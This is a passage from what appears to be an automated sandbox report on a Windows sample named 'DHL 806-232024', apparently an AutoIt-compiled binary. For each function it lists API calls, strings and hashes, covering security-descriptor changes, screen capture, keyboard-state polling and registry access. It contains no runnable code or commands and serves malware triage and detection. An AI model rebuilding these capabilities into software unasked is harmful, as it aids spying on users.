Part of subcall function 009287E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00928240,?), ref: 0092880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00928458
_memset.LIBCMT ref: 0092846D
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0092848C
GetLengthSid.ADVAPI32(?), ref: 0092849D
GetAce.ADVAPI32(?,00000000,?), ref: 009284DA
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009284F6
GetLengthSid.ADVAPI32(?), ref: 00928513
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00928522
HeapAlloc.KERNEL32(00000000), ref: 00928529
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0092854A
CopySid.ADVAPI32(00000000), ref: 00928551
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00928582
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009285A8
SetUserObjectSecurity.USER32(?,00000004,?), ref: 009285BC

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 105e21f915047bbdb8fde2080944b25dbc5723d388e9484179e48170056ba817
Instruction ID: 4c84bc515e20d784d7f46d56f5c7cb7dbbad14c0439c397a7963fac88e5400e9
Opcode Fuzzy Hash: 105e21f915047bbdb8fde2080944b25dbc5723d388e9484179e48170056ba817
Instruction Fuzzy Hash: 0E61597190121AABDF00DFA5EC48EAEBBB9FF04311F088169F815A7291DB349A04DF60

Function 0094762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 009476A2
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 009476AE
CreateCompatibleDC.GDI32(?), ref: 009476BA
SelectObject.GDI32(00000000,?), ref: 009476C7
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0094771B
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00947757
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0094777B
SelectObject.GDI32(00000006,?), ref: 00947783
DeleteObject.GDI32(?), ref: 0094778C
DeleteDC.GDI32(00000006), ref: 00947793
ReleaseDC.USER32(00000000,?), ref: 0094779E

Strings

(, xrefs: 00947723

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: ce727780850468428179fc68a4fef8058fc0971cd44d546d0d7e5b8d91e84b4f
Instruction ID: 98c0d330b6954667366003622b029db2a99b686f78f5cdbd09539a8bd1abbcb9
Opcode Fuzzy Hash: ce727780850468428179fc68a4fef8058fc0971cd44d546d0d7e5b8d91e84b4f
Instruction Fuzzy Hash: 86513875908309EFCB15CFA9CC85EAEBBB9EF48710F14852DF94AA7250D731A940CB60

Function 0093A0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,0095FB78), ref: 0093A0FC

Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82

LoadStringW.USER32(?,?,00000FFF,?), ref: 0093A11E
__swprintf.LIBCMT ref: 0093A177
__swprintf.LIBCMT ref: 0093A190
_wprintf.LIBCMT ref: 0093A246
_wprintf.LIBCMT ref: 0093A264

Strings

^ ERROR, xrefs: 0093A1E8
"%s" (%d) : ==> %s:, xrefs: 0093A25F
Line %d (File "%s"):, xrefs: 0093A171, 0093A18A
Error: , xrefs: 0093A20E
"%s" (%d) : ==> %s:%s%s, xrefs: 0093A241

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: 0446497a11ff4da420c6a12543232fb7d9a4c5394dd5bd1485f1ec286ec285bc
Instruction ID: 1bed7ac30e7368332a35a8a5f77a3daed82b37a5a8c364dba0f3f0169289e060
Opcode Fuzzy Hash: 0446497a11ff4da420c6a12543232fb7d9a4c5394dd5bd1485f1ec286ec285bc
Instruction Fuzzy Hash: 99518E31904219AACF15EBE4CD86EEEB779FF04300F100266F515B22A1EB356F48DB52

Function 008D6BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 008F0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,008D6C6C,?,00008000), ref: 008F0BB7

Part of subcall function 008D48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008D48A1,?,?,008D37C0,?), ref: 008D48CE

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 008D6D0D
SetCurrentDirectoryW.KERNEL32(?), ref: 008D6E5A

Part of subcall function 008D59CD: _wcscpy.LIBCMT ref: 008D5A05

Part of subcall function 008F387D: _iswctype.LIBCMT ref: 008F3885

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0090E8BF
Unterminated string, xrefs: 0090EC0D
AU3!, xrefs: 008D6CC1
Error opening the file, xrefs: 0090E866, 0090E8E1
Bad directive syntax error, xrefs: 0090EBC6
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0090E84A
EA06, xrefs: 0090E87B

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 5c768bdc875eec865217385865f10a792338eb6b9374ba0a1180116a6c6743b2
Instruction ID: a58f73cf7a9e53af7b390a34907c0f4d4aeaec2c76a1d7b2d05812229d7ed005
Opcode Fuzzy Hash: 5c768bdc875eec865217385865f10a792338eb6b9374ba0a1180116a6c6743b2
Instruction Fuzzy Hash: F90258711083459FC724EF28C891AAEBBE5FF99314F144A1EF496972A1EB30D949CB43

Function 008D45DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008D45F9
GetMenuItemCount.USER32(00996890), ref: 0090D7CD
GetMenuItemCount.USER32(00996890), ref: 0090D87D
GetCursorPos.USER32(?), ref: 0090D8C1
SetForegroundWindow.USER32(00000000), ref: 0090D8CA
TrackPopupMenuEx.USER32(00996890,00000000,?,00000000,00000000,00000000), ref: 0090D8DD
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0090D8E9

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 5228ef222ceb6f1570638235e8120e8866fe1d03683537be6a88c9be7f10527c
Instruction ID: 9a2cd65d1f3c659cbac32df0e509da6f9454a894e8b3c014bcad660c33da3088
Opcode Fuzzy Hash: 5228ef222ceb6f1570638235e8120e8866fe1d03683537be6a88c9be7f10527c
Instruction Fuzzy Hash: 90712770645209BFFB208F55DC89FAABF68FF45368F204216F515A61E1C7B1AC10DB90

Function 009510A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00950038,?,?), ref: 009510BC

Strings

HKU, xrefs: 009511CE
HKLM, xrefs: 0095113A
HKEY_USERS, xrefs: 009511BD
HKEY_CURRENT_CONFIG, xrefs: 00951179
HKEY_CLASSES_ROOT, xrefs: 0095114F
HKEY_LOCAL_MACHINE, xrefs: 00951125
HKCC, xrefs: 0095118A
HKCR, xrefs: 00951164
HKEY_CURRENT_USER, xrefs: 0095119B
HKCU, xrefs: 009511AC

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 7ca2330b5612b2297167b27a947e5a29615d188f074210b38decf3c03318c94b
Instruction ID: a95214c18fc70f1c7ff697f61253cb2b48a8c22c9f4b075f1ff0c0d58faf1d8e
Opcode Fuzzy Hash: 7ca2330b5612b2297167b27a947e5a29615d188f074210b38decf3c03318c94b
Instruction Fuzzy Hash: 39415B3015834E8BCF20FFA5D891AEA3764FF12301F544655EDA19B292DB34AD1ACB61

Function 00935569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66

Part of subcall function 008D7A84: _memmove.LIBCMT ref: 008D7B0D

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 009355D2
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 009355E8
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009355F9
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0093560B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0093561C

Strings

close PlayMe, xrefs: 009355E3, 00935610
play PlayMe, xrefs: 00935617
open , xrefs: 00935581
play PlayMe wait, xrefs: 00935606
status PlayMe mode, xrefs: 009355CD
alias PlayMe, xrefs: 009355AB

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 93ec20d324fd1785b76fd7e9859aa17f91ec4f1613fd34804244d446a74ee58d
Instruction ID: 80320b10b32f745538a3090c05f33ddf6e413757b73ba5d043e913536d0a37ca
Opcode Fuzzy Hash: 93ec20d324fd1785b76fd7e9859aa17f91ec4f1613fd34804244d446a74ee58d
Instruction Fuzzy Hash: 6D11942055016979E720B665DC4ADFF7B7CFFD5F04F40056BB401E21D1EE641E05CAA2

Function 009348F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 0093490E
gethostname.WSOCK32(?,00000100), ref: 00934928
gethostbyname.WSOCK32(?), ref: 00934935
_wcscpy.LIBCMT ref: 0093495D
_memmove.LIBCMT ref: 00934970
inet_ntoa.WSOCK32(?), ref: 0093497B
_strcat.LIBCMT ref: 00934989
_wcscpy.LIBCMT ref: 009349A0
WSACleanup.WSOCK32 ref: 009349AE
_wcscpy.LIBCMT ref: 009349BC

Strings

0.0.0.0, xrefs: 00934957

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 2bfa724d9b8f6b11fe4229067ef3716e8d386d33ea0eeff48c29c26cb0e595a4
Instruction ID: 31b282a6ed3ab05f0ee6d4964ec7d9e6ef3c08333f871838dd7b31b4a58b59e9
Opcode Fuzzy Hash: 2bfa724d9b8f6b11fe4229067ef3716e8d386d33ea0eeff48c29c26cb0e595a4
Instruction Fuzzy Hash: 1511EB31918118ABCB20EB34EC4AFEB77BCEF44721F050176F505D6161EF759A819B52

Function 00935217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0093521C

Part of subcall function 008F0719: timeGetTime.WINMM(?,75A8B400,008E0FF9), ref: 008F071D

Sleep.KERNEL32(0000000A), ref: 00935248
EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0093526C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0093528E
SetActiveWindow.USER32 ref: 009352AD
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 009352BB
SendMessageW.USER32(00000010,00000000,00000000), ref: 009352DA
Sleep.KERNEL32(000000FA), ref: 009352E5
IsWindow.USER32 ref: 009352F1
EndDialog.USER32(00000000), ref: 00935302

Strings

BUTTON, xrefs: 00935280

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 1e64b250915191ec7f7c041fa7f0500bad8d321f1b6d30e103f15fa2547de7f4
Instruction ID: e9d76c599801249e69990f9e2c6ed9853b7001c8967ad21712aff18efbc1bed9
Opcode Fuzzy Hash: 1e64b250915191ec7f7c041fa7f0500bad8d321f1b6d30e103f15fa2547de7f4
Instruction Fuzzy Hash: 6C21C37022D704AFE7005BB5EC98B2B7B6DEB8A35BF060425F412821B1DB61DC40BF22

Function 0093D7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C

CoInitialize.OLE32(00000000), ref: 0093D855
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0093D8E8
SHGetDesktopFolder.SHELL32(?), ref: 0093D8FC
CoCreateInstance.OLE32(00962D7C,00000000,00000001,0098A89C,?), ref: 0093D948
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0093D9B7
CoTaskMemFree.OLE32(?,?), ref: 0093DA0F
_memset.LIBCMT ref: 0093DA4C
SHBrowseForFolderW.SHELL32(?), ref: 0093DA88
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0093DAAB
CoTaskMemFree.OLE32(00000000), ref: 0093DAB2
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0093DAE9
CoUninitialize.OLE32(00000001,00000000), ref: 0093DAEB

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 584fac2075002fe3c9bf7911300642e9b218d9108c4f9d3195ea34ccf73735bb
Instruction ID: 188d1d9b1f6575fc805c3dd846bc6981d86f6d6d9476a8fb4fba71f00408a84a
Opcode Fuzzy Hash: 584fac2075002fe3c9bf7911300642e9b218d9108c4f9d3195ea34ccf73735bb
Instruction Fuzzy Hash: 60B1F975A00219AFDB04DFA5D898EAEBBB9FF48314F048469F506EB261DB30AD41CF51

Function 0093052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 009305A7
SetKeyboardState.USER32(?), ref: 00930612
GetAsyncKeyState.USER32(000000A0), ref: 00930632
GetKeyState.USER32(000000A0), ref: 00930649
GetAsyncKeyState.USER32(000000A1), ref: 00930678
GetKeyState.USER32(000000A1), ref: 00930689
GetAsyncKeyState.USER32(00000011), ref: 009306B5
GetKeyState.USER32(00000011), ref: 009306C3
GetAsyncKeyState.USER32(00000012), ref: 009306EC
GetKeyState.USER32(00000012), ref: 009306FA
GetAsyncKeyState.USER32(0000005B), ref: 00930723
GetKeyState.USER32(0000005B), ref: 00930731

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 7d8aa5143ee2937812e3f03efd267fa14e0b1b75248a5c4a5982c59fc4db10c9
Instruction ID: 50ccd1a8150bb4a8286277c35cd9580d30ede7a86c8b3d3d72a616d643a340e9
Opcode Fuzzy Hash: 7d8aa5143ee2937812e3f03efd267fa14e0b1b75248a5c4a5982c59fc4db10c9
Instruction Fuzzy Hash: CD511C60A0878829FB34DBB088757EABFB89F81380F08459DD5C2571C2DA64DB4CCF65

Function 0092C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0092C746
GetWindowRect.USER32(00000000,?), ref: 0092C758
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0092C7B6
GetDlgItem.USER32(?,00000002), ref: 0092C7C1
GetWindowRect.USER32(00000000,?), ref: 0092C7D3
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0092C827
GetDlgItem.USER32(?,000003E9), ref: 0092C835
GetWindowRect.USER32(00000000,?), ref: 0092C846
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0092C889
GetDlgItem.USER32(?,000003EA), ref: 0092C897
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0092C8B4
InvalidateRect.USER32(?,00000000,00000001), ref: 0092C8C1

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: f0d8a6904a55f76cc8ced231efacce4701a58ca36abc7b403393635f03c6a1b7
Instruction ID: ee36cd5273971fccbbe29ec03b327a54cbadd5843a4e6df41afdef45403ec2bc
Opcode Fuzzy Hash: f0d8a6904a55f76cc8ced231efacce4701a58ca36abc7b403393635f03c6a1b7
Instruction Fuzzy Hash: F6512FB1B10209AFDF18CFA9DD99AAEBBBAEB88311F14812DF515D7294D7709D008B50

Function 008D201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 008D1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008D2036,?,00000000,?,?,?,?,008D16CB,00000000,?), ref: 008D1B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 008D20D3
KillTimer.USER32(-00000001,?,?,?,?,008D16CB,00000000,?,?,008D1AE2,?,?), ref: 008D216E
DestroyAcceleratorTable.USER32(00000000), ref: 0090BEF6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008D16CB,00000000,?,?,008D1AE2,?,?), ref: 0090BF27
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008D16CB,00000000,?,?,008D1AE2,?,?), ref: 0090BF3E
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008D16CB,00000000,?,?,008D1AE2,?,?), ref: 0090BF5A
DeleteObject.GDI32(00000000), ref: 0090BF6C

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: d0be54da5a1d3b47206ee63a0a16fae6172362372c11e45f68308182d1345207
Instruction ID: 734fc19d3c193a9710e8f1bd9823ed642188231f67e2c32d04b6ee174b5d206d
Opcode Fuzzy Hash: d0be54da5a1d3b47206ee63a0a16fae6172362372c11e45f68308182d1345207
Instruction Fuzzy Hash: 60619D31118715DFCB25AF1ACD58B29B7F1FF60326F10862AE542876A0C771AC80EF51

Function 008D21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 008D25DB: GetWindowLongW.USER32(?,000000EB), ref: 008D25EC

GetSysColor.USER32(0000000F), ref: 008D21D3

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: eeea387df8b71074010389edf2b4dcb381aacfc07fd163d1f32f80a97cb27a24
Instruction ID: c0ea6cff6a20cc939848548d6d8e9a2cb02019877bb5f971e0de3a8e377aa5dd
Opcode Fuzzy Hash: eeea387df8b71074010389edf2b4dcb381aacfc07fd163d1f32f80a97cb27a24
Instruction Fuzzy Hash: 064190311086449FDB215F29DC58BB97B66FB16332F144366FD65CA2E2C7318C42EB61

